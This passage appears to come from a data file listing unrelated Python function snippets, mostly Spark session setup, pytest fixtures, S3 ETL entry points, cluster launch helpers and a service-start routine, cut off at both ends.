SparkContext()\n sqlContext = HiveContext(sc)", "def setUpClass(cls):\n \n logging.info(\"Logging from within setup\")\n cls.spark=SparkSession \\\n .builder \\\n .appName(\"sampleTest\") \\\n .master(\"local\") \\\n .getOrCreate()\n cls.spark.sparkContext.setLogLevel(\"ERROR\")", "def test_slurm_xsede_comet_spark(self):\n\n # Set environment variables\n os.environ['SLURM_NODELIST'] = 'nodes[1-2]'\n os.environ['SLURM_NPROCS'] = '24'\n os.environ['SLURM_NNODES'] = '2'\n os.environ['SLURM_CPUS_ON_NODE'] = '24'\n\n # Run component with desired configuration\n self.component._cfg = self.cfg_xsede_comet_spark\n self.component._configure()\n\n # Verify configured correctly\n self.assertEqual(self.component.cores_per_node, 24)\n self.assertEqual(self.component.gpus_per_node, 0)\n self.assertEqual(self.component.lfs_per_node['path'], \"/scratch/$USER/$SLURM_JOB_ID\")\n self.assertEqual(self.component.lfs_per_node['size'], 176105)\n self.assertEqual(self.component.lm_info['cores_per_node'], 24)\n\n return", "def spark(tmp_path_factory, app_name=\"Sample\", url=\"local[*]\"):\n\n with TemporaryDirectory(dir=tmp_path_factory.getbasetemp()) as td:\n config = {\n \"spark.local.dir\": td,\n \"spark.sql.shuffle.partitions\": 1,\n \"spark.sql.crossJoin.enabled\": \"true\",\n }\n spark = start_or_get_spark(app_name=app_name, url=url, config=config)\n yield spark\n spark.stop()", "def test_slurm_xsede_supermic_spark(self):\n\n # Set environment variables\n os.environ['SLURM_NODELIST'] = 'nodes[1-2]'\n os.environ['SLURM_NPROCS'] = '24'\n os.environ['SLURM_NNODES'] = '2'\n os.environ['SLURM_CPUS_ON_NODE'] = '24'\n\n # Run component with desired configuration\n self.component._cfg = self.cfg_xsede_supermic_spark\n self.component._configure()\n\n # Verify configured correctly\n self.assertEqual(self.component.cores_per_node, 20)\n self.assertEqual(self.component.gpus_per_node, 0)\n self.assertEqual(self.component.lfs_per_node['path'], \"/var/scratch/\")\n self.assertEqual(self.component.lfs_per_node['size'], 200496)\n self.assertEqual(self.component.lm_info['cores_per_node'], 20)\n\n return", "def spark_session_test() -> SparkSession:\n return SparkSession.builder.appName(\"pytest\").getOrCreate()", "def spark_context(request):\n spark = SparkSession.builder.master(\"local[1]\").appName(\"pytest-test\").getOrCreate()\n request.addfinalizer(lambda: spark.stop())\n\n quiet_py4j()\n return spark", "def main() -> None:\n ROOT_DIR = dirname(abspath(__file__))\n spark = create_spark_session()\n input_data = 's3a://udacity-dend/'\n output_data = ROOT_DIR + '/data/'\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)", "def main(_config, _run):\n sacred.commands.print_config(_run)\n dump_config_and_makefile()\n prepare_and_train()", "def spark_setup(self):\n # Update the global variables for config details\n globals()[\"spark_token\"] = self.spark_bot_token\n globals()[\"bot_email\"] = self.spark_bot_email\n\n sys.stderr.write(\"Spark Bot Email: \" + self.spark_bot_email + \"\\n\")\n sys.stderr.write(\"Spark Token: REDACTED\\n\")\n\n # Setup the Spark Connection\n globals()[\"spark\"] = CiscoSparkAPI(access_token=self.spark_bot_token)\n globals()[\"webhook\"] = self.setup_webhook(self.spark_bot_name,\n self.spark_bot_url)\n sys.stderr.write(\"Configuring Webhook. \\n\")\n sys.stderr.write(\"Webhook ID: \" + globals()[\"webhook\"].id + \"\\n\")", "def main():\n spark_it_up()", "def setUpClass(self):\n\n # Create a new temporary folder\n self.dir = tempfile.mkdtemp(self.__name__, dir=os.getcwd()) # this folder should be on a hadoop file system\n\n if self.dir.startswith(\"/gpfs/\"):\n # remove /gpfs/ because on sdil hadoop-path starts at \"/smartdata/\"\n self.dir = \"/\" + self.dir.split(\"/\", 2)[2]\n \n dirhash._logger.info(\"writing test data to folder \\\"%s\\\"\", self.dir)\n \n # create some sub-folder\n os.makedirs(self.dir + \"/dir/subdir1\")\n os.makedirs(self.dir + \"/dir/subdir2\")\n os.makedirs(self.dir + \"/dir/subdir3\")\n os.makedirs(self.dir + \"/dir/emptysubdir\")\n dirhash._logger.info(\"created subdirectories\")\n \n # Create a lorem ipsum file\n with open(self.dir + \"/\" + self.LOREM_IPSUM_PATH, \"w\") as f:\n f.write(self.LOREM_IPSUM_TEXT)\n \n # Create an HTML file\n with open(self.dir + \"/\" + self.HELLO_WORLD_HTML_PATH, \"w\") as f:\n f.write(self.HELLO_WORLD_HTML_TEXT)\n \n # Create a file holding typical passwords\n with open(self.dir + \"/\" + self.PASSWORDS_PATH, \"w\") as f:\n f.write(self.PASSWORDS_TEXT)\n \n # just a few characters\n with open(self.dir + \"/\" + self.ABC_PATH, \"w\") as f:\n f.write(self.ABC_TEXT)\n \n # an empty file\n with open(self.dir + \"/\" + self.EMPTY_FILE_PATH, \"w\") as f:\n f.write(\"\")\n \n # create a file of 32 * 1024 * 1024 zero bytes\n with open(self.dir + \"/\" + self.MANY_ZEROS_PATH, \"wb\") as f:\n f.write(b\"\\0\" * (32 * 1024 * 1024))\n \n # create a spark context for execution, that will run all jobs locally\n self._context = SparkContext(appName=\"dirhash_test\")\n self._context.addPyFile('dirhash.py')", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"data/analytics\"\n \n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def main():\n spark = create_spark_session()\n logging.info('Spark Session created')\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://dend-emr-project\"\n #input_data = './data/'\n #output_data = '/Users/daniel/Desktop/output/'\n logging.info(f'Set input path to {input_data}')\n logging.info(f'Set output path to {output_data}')\n \n copy_raw_data(spark, input_data, output_data)\n\n s3_data = restore_data_from_s3(spark, output_data)\n \n sas_desc_string = load_sas_desc_file(input_data)\n \n process_fact_table(spark, s3_data, output_data, sas_desc_string)\n \n process_dim_tables(spark, s3_data, output_data, sas_desc_string)\n\n data_quality_check(spark, output_data)\n \n logging.info('ETL process successfully finished.')", "def getSparkContext():\n conf = (SparkConf()\n .setMaster(\"local\") # run on local\n .setAppName(\"Logistic Regression\") # Name of App\n .set(\"spark.executor.memory\", \"1g\")) # Set 1 gig of memory\n sc = SparkContext(conf = conf) \n return sc", "def spark(self, *args, **kwargs):\n self.spark_submit(*args, **kwargs)", "def __init__(self, conf: ExpConfig, estep_conf: EStepConfig, model: Trainable, data_file: str):\n if tvo.get_run_policy() == \"mpi\":\n init_processes()\n dataset = get_h5_dataset_to_processes(data_file, (\"test_data\", \"data\"))\n\n setattr(conf, \"test_dataset\", data_file)\n super().__init__(conf, estep_conf, model, None, dataset)", "def spark_unit_tests(global_args: dict = None, verbose: bool = False):\n if global_args is None:\n global_args = globals()\n\n conf = SparkConf()\n\n # Extra package for tests\n confdic = {\n \"spark.python.daemon.module\": \"coverage_daemon\"\n }\n\n # Use only 2 threads for tests\n conf.setMaster(\"local[2]\")\n\n # Name of the test job\n conf.setAppName(\"test_spark_job\")\n\n for k, v in confdic.items():\n conf.set(key=k, value=v)\n\n spark = SparkSession\\\n .builder\\\n .config(conf=conf)\\\n .getOrCreate()\n\n global_args[\"spark\"] = spark\n\n # Numpy introduced non-backward compatible change from v1.14.\n if np.__version__ >= \"1.14.0\":\n np.set_printoptions(legacy=\"1.13\")\n\n sys.exit(doctest.testmod(globs=global_args, verbose=verbose)[0])", "def _environment(self):\n\n self.spark_home = self._config_default(\"spark-home\",\n self._context(SparkSubmit.SPARK_HOME, default = os.environ.get(SparkSubmit.SPARK_HOME,None)))\n assert self.spark_home, \"unable to detect SPARK_HOME. set SPARK_HOME as directed in the task documentation\"\n assert os.path.exists(self.spark_home), \"provided SPARK_HOME doesn't exists\"\n\n spark_config = {'cluster-config': {}, 'other-config': {}}\n if 'config-file' in self._config_keys():\n spark_config.update(yaml.load(open(self._config('config-file')))['spark-config'])\n\n self.app_config = []\n\n spark_app = self._config('app-config')\n self.app_config.append(spark_app['application'])\n app_params = SparkSubmit._flat_node_to_cmd_line_args(spark_app['params']) if 'params' in spark_app else []\n self.app_config.extend(app_params)\n if 'resources' in spark_app:\n resources = [ ['--%s' % item] + (spark_app['resources'][item]) for item in spark_app['resources'].keys() ]\n self.resources = list(itertools.chain(*resources))\n else:\n self.resources = []\n\n\n cluster_config = self._config_default('cluster-config', {})\n cluster_config.update(spark_config['cluster-config'])\n self.cluster_options = list(itertools.chain(*[ ['--%s' % item, str(cluster_config[item]) ] for item in cluster_config.keys() ]))\n\n\n ##other options\n ## cluster options\n other_options = self._config_default('other-config',{})\n cluster_config.update(spark_config['other-config'])\n self.other_options = list(itertools.chain(*[ ['--%s' % item, str(other_options[item]) ] for item in other_options.keys() ]))", "def test_inputmode_spark(self):\n def _map_fun(args, ctx):\n import tensorflow as tf\n cluster, server = TFNode.start_cluster_server(ctx)\n if ctx.job_name == \"ps\":\n server.join()\n elif ctx.job_name == \"worker\":\n with tf.device(tf.train.replica_device_setter(\n worker_device=\"/job:worker/task:%d\" % ctx.task_index,\n cluster=cluster)):\n x = tf.placeholder(tf.int32, [None, 1])\n sq = tf.square(x)\n init_op = tf.global_variables_initializer()\n with tf.train.MonitoredTrainingSession(is_chief=(ctx.task_index == 0)) as sess:\n tf_feed = TFNode.DataFeed(ctx.mgr, False)\n while not sess.should_stop() and not tf_feed.should_stop():\n outputs = sess.run([sq], feed_dict={x: tf_feed.next_batch(10)})\n tf_feed.batch_results(outputs[0])\n\n input = [[x] for x in range(1000)] # set up input as tensors of shape [1] to match placeholder\n rdd = self.sc.parallelize(input, 10)\n cluster = TFCluster.run(self.sc, _map_fun, tf_args={}, num_executors=self.num_workers, num_ps=0, input_mode=TFCluster.InputMode.SPARK)\n rdd_out = cluster.inference(rdd)\n rdd_sum = rdd_out.sum()\n self.assertEqual(rdd_sum, sum([x * x for x in range(1000)]))\n cluster.shutdown()", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://udacity-data-lake/output/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)", "def main(input_dir, output):\n\tspark = create_spark_session()\n\tprocess_header_data(spark, input_dir, output)", "def create_spark_session(self):\n\n spark_jar_path = os.getenv(\"SPARK_JARS_PATH\")\n spark_jars = [os.path.join(spark_jar_path, jars) for jars in os.listdir(spark_jar_path)] \n\n self.spark = SparkSession\\\n .builder\\\n .config(\"spark.jars\", \",\".join(spark_jars))\\\n .appName(appname)\\\n .getOrCreate()", "def launch(config):\n \n launch_with_configs([config])", "def __init__(self,env,config_file):\n #load all the properties\n self.properties = util.load_application_properties(env, config_file)\n self.cassandra_server = self.properties[\"cassandra.host.name\"]\n self.cassandra_trip_table = self.properties[\"cassandra.trip_data_table\"]\n self.cassandra_stats_table = self.properties[\"cassandra.trip_stats_table\"]\n self.cassandra_keyspace = self.properties[\"cassandra.trip.keyspace\"]\n self.spark_master = self.properties[\"spark.master\"]\n self.s3_url=self.properties[\"batch_s3_url\"]\n\n #initialize SparkConf and SparkContext along with cassandra settings\n self.conf = SparkConf().setAppName(\"trip\").set(\"spark.cassandra.connection.host\",self.cassandra_server)\n self.sc = SparkContext(conf=self.conf)\n self.sqlContext = SQLContext(self.sc)", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://udacity-nanodegree-data-engineer/\"\n \n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def cli():\n # Configuration\n AppConfig()\n\n # Parse the cli arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('standard_data_path', help='path to the standard data directory')\n parser.add_argument('queue', help='job queue')\n parser.add_argument('--app-name', help='spark application name which must contain the application prd',\n default='gmt00-diaman-ai')\n parser.add_argument('--driver-mem', help='amount of memory to use for the driver process',\n default='4g')\n parser.add_argument('--driver-cores', help='number of cores to use for the driver process',\n default=1)\n parser.add_argument('--executor-mem', help='amount of memory to use per executor process',\n default='8g')\n parser.add_argument('--executor-cores', help='number of cores to use on each executor',\n default=4)\n parser.add_argument('--min-executors', help='minimum number of executors to run if dynamic allocation is enabled',\n default=4)\n parser.add_argument('--max-executors', help='maximum number of executors to run if dynamic allocation is enabled',\n default=12)\n parser.add_argument('--ini-executors', help='initial number of executors to run if dynamic allocation is enabled',\n default=4)\n args = parser.parse_args()\n\n # Instantiate spark\n _, spark_session = spark_config.get_spark(app_name=args.app_name,\n queue=args.queue,\n driver_mem=args.driver_mem,\n driver_cores=args.driver_cores,\n executor_mem=args.executor_mem,\n executor_cores=args.executor_cores,\n min_executors=args.min_executors,\n max_executors=args.max_executors,\n ini_executors=args.ini_executors)\n\n # Run the train pipeline\n train_pipeline.run(spark_session, args.standard_data_path)", "def main():\n spark = create_spark_session()\n\n input_data = \"s3a://udacitydenanodegree2020/\"\n output_data = \"s3a://udacitydenanodegree2020/output/\"\n\n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def start_sml():\n launchfile = basepath + '/launch/teststarter.launch'\n\n uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n #print roslaunch.rlutil.check_roslaunch(launchfile)\n #roslaunch.configure_logging(uuid)\n launch = roslaunch.parent.ROSLaunchParent(uuid, [launchfile])\n launch.start()", "def spark_session(request):\n def fin():\n \"\"\"Clean up.\n \"\"\"\n spark.stop()\n request.addfinalizer(fin)\n\n spark = ps.SparkSession.builder.master('local')\\\n .appName('Spark Tute PyTest')\\\n .config('spark.executor.memory', '2g')\\\n .config('spark.executor.cores', '2')\\\n .config('spark.cores.max', '10')\\\n .config('spark.ui.port', '4050')\\\n .config('spark.logConf', True)\\\n .config('spark.debug.maxToStringFields', 100)\\\n .getOrCreate()\n\n return spark", "def myjob(spark: SparkSession, **kwargs):\n df = spark.read.csv(\"spark-data/climatewatch-usemissions.csv\")\n\n df.show()", "def launch_training_job(master_nodes, trainset_date, opts, ec2_opts):\n # TODO: check whether HDFS is running\n # TODO: check whether YARN is running\n master = master_nodes[0].public_dns_name\n print(\"Setting up HDFS on the cluster..\")\n ssh(host=master, opts=ec2_opts, command=\"chmod u+x /root/spark-ec2/setup_pricer_data.sh\")\n ssh(host=master, opts=ec2_opts, command=\"/root/spark-ec2/setup_pricer_data.sh\")\n print(\"Running trainer with train date={d}..\".format(d=trainset_date))\n ssh(host=master, opts=ec2_opts, command=\"chmod u+x /root/spark-ec2/run_aws_trainer.sh\")\n ssh(host=master, opts=ec2_opts, command=\"nohup /root/spark-ec2/run_aws_trainer.sh {d} 2>&1 </dev/null |tee log.aws_trainer\".format(d=trainset_date))\n print(\"Trainer was launched successfully..\")", "def create_spark_session():\n try:\n spark = (\n SparkSession.builder\n .config(\"spark.jars.packages\", os.environ['SAS_JAR'])\n # .config(\"spark.hadoop.fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID'])\n # .config(\"spark.hadoop.fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY'])\n .enableHiveSupport()\n .getOrCreate()\n )\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID'])\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY'])\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.impl\",\"org.apache.hadoop.fs.s3a.S3AFileSystem\")\n # spark._jsc.hadoopConfiguration().set(\"com.amazonaws.services.s3.enableV4\", \"true\")\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.aws.credentials.provider\",\"org.apache.hadoop.fs.s3a.BasicAWSCredentialsProvider\")\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.endpoint\", \"s3.amazonaws.com\")\n except Exception as e:\n logger.error('Pyspark session failed to be created...')\n raise\n return spark", "def test_init(spark):\n io_handler = IOHandler(spark)\n assert io_handler", "def start_training(self, logdir: str, **info):\n pass", "def main(self, sc: SparkContext, *args: Any):\n experiment_parquet_path = args[0]\n mouse_parquet_path = args[1]\n embryo_parquet_path = args[2]\n impress_parquet_path = args[3]\n output_path = args[4]\n spark = SparkSession(sc)\n experiment_normalized_df = self.cross_reference_experiments(\n spark,\n experiment_parquet_path,\n mouse_parquet_path,\n embryo_parquet_path,\n impress_parquet_path,\n )\n experiment_normalized_df.write.mode(\"overwrite\").parquet(output_path)", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend\"\n output_data = \"s3a://vivek1bucket\"\n \n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def launch(self):\n self.register_env_creator()\n\n # All worker nodes will block at this step during training\n ray_cluster_config = self.ray_init_config()\n if not self.is_master_node:\n return\n\n # Start the driver on master node\n ray.init(**ray_cluster_config)\n experiment_config = self.get_experiment_config()\n experiment_config = self.customize_experiment_config(experiment_config)\n print(\"Running experiment with config %s\" % json.dumps(experiment_config, indent=2))\n run_experiments(experiment_config)\n\n all_wokers_host_names = self.get_all_host_names()[1:]\n # If distributed job, send TERMINATION_SIGNAL to all workers.\n if len(all_wokers_host_names) > 0:\n self.sage_cluster_communicator.create_s3_signal(TERMINATION_SIGNAL)", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://dend-bucket-cpm/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)", "def read_data(spark_session, filename_template, sample_size, channels, sample_prob, normalize_class_distribution, seed):\n # TODO: Clean this function up!!!\n assert channels in (1, 3)\n grayscale = False if channels == 3 else True\n\n # Sample (Optional)\n if sample_prob < 1:\n try:\n # Ex: `train_0.01_sample_256.parquet`\n sampled_filename_template = filename_template.format(\"{}_sample_\".format(sample_prob), sample_size, \"_grayscale\" if grayscale else \"\")\n filename = os.path.join(\"data\", sampled_filename_template)\n df = spark_session.read.load(filename)\n except: # Pre-sampled DataFrame not available\n filename = os.path.join(\"data\", filename_template.format(\"\", sample_size, \"_grayscale\" if grayscale else \"\"))\n df = spark_session.read.load(filename)\n p = sample_prob # sample percentage\n if normalize_class_distribution:\n # stratified sample with even class proportions\n n = df.count() # num examples\n K = 3 # num classes\n s = p * n # num examples in p% sample, as a fraction\n s_k = s / K # num examples per class in evenly-distributed p% sample, as fraction\n class_counts_df = df.select(\"tumor_score\").groupBy(\"tumor_score\").count()\n class_counts = {row[\"tumor_score\"]:row[\"count\"] for row in class_counts_df.collect()}\n ps = {k:s_k/v for k,v in class_counts.items()}\n df = df.sampleBy(\"tumor_score\", fractions=ps, seed=seed)\n else:\n # stratified sample maintaining the original class proportions\n df = df.sampleBy(\"tumor_score\", fractions={1: p, 2: p, 3: p}, seed=seed)\n # TODO: Determine if coalesce actually provides a perf benefit on Spark 2.x\n #train_df.cache(), val_df.cache() # cache here, or coalesce will hang\n # tc = train_df.count()\n # vc = val_df.count()\n #\n # # Reduce num partitions to ideal size (~128 MB/partition, determined empirically)\n # current_tr_parts = train_df.rdd.getNumPartitions()\n # current_val_parts = train_df.rdd.getNumPartitions()\n # ex_mb = sample_size * sample_size * channels * 8 / 1024 / 1024 # size of one example in MB\n # ideal_part_size_mb = 128 # 128 MB partitions sizes are empirically ideal\n # ideal_exs_per_part = round(ideal_part_size_mb / ex_mb)\n # tr_parts = round(tc / ideal_exs_per_part)\n # val_parts = round(vc / ideal_exs_per_part)\n # if current_tr_parts > tr_parts:\n # train_df = train_df.coalesce(tr_parts)\n # if current_val_parts > val_parts:\n # val_df = val_df.coalesce(val_parts)\n # train_df.cache(), val_df.cache()\n else:\n # Read in data\n filename = os.path.join(\"data\", filename_template.format(\"\", sample_size, \"_grayscale\" if grayscale else \"\"))\n df = spark_session.read.load(filename)\n\n return df", "def __init__(self, dataset_path):\n self.dataset_path = dataset_path\n conf = SparkConf().setAppName(\"movie_recommendation-server\")\n # IMPORTANT: pass aditional Python modules to each worker\n self.sc = SparkContext(conf=conf)\n logger.info(\"Starting up the Recommendation Engine: \")\n # Load ratings data for later use\n logger.info(\"Loading Ratings data...\")\n ratings_file_path = os.path.join(self.dataset_path, 'ratings.csv')\n ratings_raw_RDD = self.sc.textFile(ratings_file_path)\n ratings_raw_data_header = ratings_raw_RDD.take(1)[0]\n self.ratings_RDD = ratings_raw_RDD.filter(lambda line: line!=ratings_raw_data_header)\\\n .map(lambda line: line.split(\",\")).map(lambda tokens: (int(tokens[0]),int(tokens[1]),float(tokens[2]))).cache()\n # Pre-calculate movies ratings counts\n self.__count_and_average_ratings()\n # Train the model\n self.rank = 8\n self.seed = 5L\n self.iterations = 10\n self.regularization_parameter = 0.1\n # self.__train_model()", "def spark_unit_tests(\n global_args: dict = None, verbose: bool = False,\n withstreaming: bool = False):\n if global_args is None:\n global_args = globals()\n\n from pyspark.sql import SparkSession\n from pyspark import SparkConf\n\n conf = SparkConf()\n confdic = {\n \"spark.jars.packages\": os.environ[\"FINK_PACKAGES\"],\n \"spark.jars\": os.environ[\"FINK_JARS\"],\n \"spark.python.daemon.module\": \"coverage_daemon\"}\n conf.setMaster(\"local[2]\")\n conf.setAppName(\"fink_test\")\n for k, v in confdic.items():\n conf.set(key=k, value=v)\n spark = SparkSession\\\n .builder\\\n .appName(\"fink_test\")\\\n .config(conf=conf)\\\n .getOrCreate()\n\n # Reduce the number of suffled partitions\n spark.conf.set(\"spark.sql.shuffle.partitions\", 2)\n\n global_args[\"spark\"] = spark\n\n if withstreaming:\n dfstream = spark.readStream.format(\"kafka\")\\\n .option(\"kafka.bootstrap.servers\", os.environ[\"KAFKA_IPPORT_SIM\"])\\\n .option(\"subscribe\", os.environ[\"KAFKA_TOPIC\"])\\\n .option(\"startingOffsets\", \"earliest\").load()\n global_args[\"dfstream\"] = dfstream\n\n # Numpy introduced non-backward compatible change from v1.14.\n if np.__version__ >= \"1.14.0\":\n np.set_printoptions(legacy=\"1.13\")\n\n sys.exit(doctest.testmod(globs=global_args, verbose=verbose)[0])", "def test_integration(spark_context, hive_context, make_requests_session):\n def session_factory():\n return make_requests_session('requests/test_integration.sqlite3')\n\n with tempdir() as dir, xgboost_mutex():\n input_dir = os.path.join(dir, 'input')\n labeled_dir = os.path.join(dir, 'labeled')\n collect_dir = os.path.join(dir, 'features')\n feature_sel_dir = os.path.join(dir, 'pruned')\n folds_dir = os.path.join(dir, 'folded')\n trained_dir = os.path.join(dir, 'trained')\n\n # Generate some fake sessions and write them out\n hive_context.createDataFrame(\n spark_context.parallelize(islice(make_fake_rows(), 0, 2000)),\n INPUT_SCHEMA\n ).write.parquet(input_dir)\n\n # Apply data collection to those sessions.\n run_data_pipeline(\n spark_context, hive_context, input_dir, labeled_dir,\n wikis=[\"enwiki\"], samples_per_wiki=5000,\n min_sessions_per_query=1, search_cluster='localhost',\n brokers=None, samples_size_tolerance=0.5,\n session_factory=session_factory)\n\n # Collect features for the labeled dataset\n # When building the fixture the featureset has to actually exist on\n # whatever elasticsearch is serving up results.\n collect_features(\n spark_context, hive_context, labeled_dir, collect_dir,\n wikis=['enwiki'], search_cluster='localhost',\n brokers=None, ltr_feature_definitions='featureset:enwiki_v1',\n session_factory=session_factory)\n\n # Run feature selection\n run_feature_selection_pipeline(\n spark_context, hive_context, input_dir=collect_dir, output_dir=feature_sel_dir,\n algo='mrmr', num_features=10, pre_selected=None, wikis=None)\n\n # Generate folds to feed into training\n make_folds(\n spark_context, hive_context, feature_sel_dir, folds_dir,\n wikis=[\"enwiki\"], zero_features=None, num_folds=2,\n num_workers=1, max_executors=2)\n\n with open(os.path.join(folds_dir, 'stats.json'), 'r') as f:\n stats = json.load(f)\n\n # Train a model\n # TODO: training pipeline differs in that it expects the\n # directory to be created by the caller.\n os.mkdir(trained_dir)\n run_train_pipeline(\n spark_context, hive_context, folds_dir, trained_dir,\n wikis=[\"enwiki\"], initial_num_trees=10, final_num_trees=None,\n num_cv_jobs=1, iterations=3)\n\n with open(os.path.join(trained_dir, 'tune_enwiki.pickle'), 'rb') as f:\n tune = pickle.load(f)\n\n model_file = os.path.join(trained_dir, 'model_enwiki.xgb')\n pybooster = xgboost.Booster()\n pybooster.load_model(model_file)\n\n # [5:] trims file: off the beginning\n dmat = xgboost.DMatrix(stats['wikis']['enwiki']['all'][0]['all'][5:] + \".xgb\")\n eval_dmat = float(pybooster.eval(dmat).split(':')[1])\n\n expect = tune['metrics']['train'][-1]\n assert expect == pytest.approx(eval_dmat, abs=0.0001)\n\n # We have to coalesce(1) because for tests all executors run in same\n # JVM and it isn't thread safe to call into xgboost from multiple\n # executor threads in parallel.\n # model = XGBoostModel.loadModelFromLocalFile(spark_context, model_file)\n # df_data = hive_context.read.parquet(data_dir)\n # eval_df = model.eval(df_data.coalesce(1))\n\n # Our fake data has a hard time passing this test, because ndcg\n # in xgboost is unstable when multiple observations in the same\n # query have the same predicted score. This should only be a\n # problem when using randomly generated clicks to get labels.\n # assert expect == pytest.approx(eval_df, abs=0.0001)", "def do_start(self,processor):\n # app_logger = self.construct_logger(rta_constants.PROPERTIES_LOG_FILE)\n running_dict = {}\n for item in self.get_running_status():\n running_dict[item.get('processor')]=item.get('status')\n\n if processor == 'spark':\n if running_dict:\n if running_dict['spark<spark_worker>'] != 'Running' and running_dict['spark<spark_master>'] != 'Running':\n try:\n cmd_line = self.cmd_start_spark\n cmd = subprocess.Popen([cmd_line],shell=True,stdout=subprocess.PIPE)\n (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['spark<spark_worker>'] == 'Running' or running_dict['spark<spark_master>'] == 'Running':\n print('Spark Server is running!! please trying to stop it before it starts.')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n return\n\n elif processor == 'tomcat':\n if running_dict.has_key('tomcat') and running_dict['tomcat'] != 'Running':\n try:\n cmd_line = self.cmd_start_tomcat\n # print('staring tomcat server------->')\n print cmd_line\n\n # 2311 Vpl update to fix problem of catalina shutdown when term exit (10.x timeout)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n #print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('tomcat'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Tomcat Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'HDFS':\n #1/5/2017 Commit by JOJO\n '''\n if running_dict.has_key('HDFS') and running_dict['HDFS'] != 'Running':\n try:\n cmd_line = self.cmd_start_hadoop_hdfs\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('HDFS has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('HDFS'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('HDFS server is running!! please trying to stop it before it start.')\n return\n '''\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif processor == 'web_management':\n if running_dict.has_key('web_management') and running_dict['web_management'] != 'Running':\n try:\n cmd_line = 'python '+self.cmd_start_web_management\n print('starting web_management webserver------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n (output,err) = cmd.communicate()\n print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('web_management webserver has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('web_management'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Flask webserver is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'novelty':\n if running_dict.has_key('novelty') and running_dict['novelty'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_novelty_detector\n # print('staring novelty------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('novelty has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('novelty'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['novelty'] == 'Running':\n print('novelty processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'raw_writer':\n if running_dict.has_key('raw_writer') and running_dict['raw_writer'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_raw_writer\n # print('staring raw_writer------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n print('raw_writer has been started!')\n return\n\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('raw_writer'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['raw_writer'] == 'Running':\n print('raw_writer processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'cassandra':\n if running_dict.has_key('cassandra') and running_dict['cassandra'] != 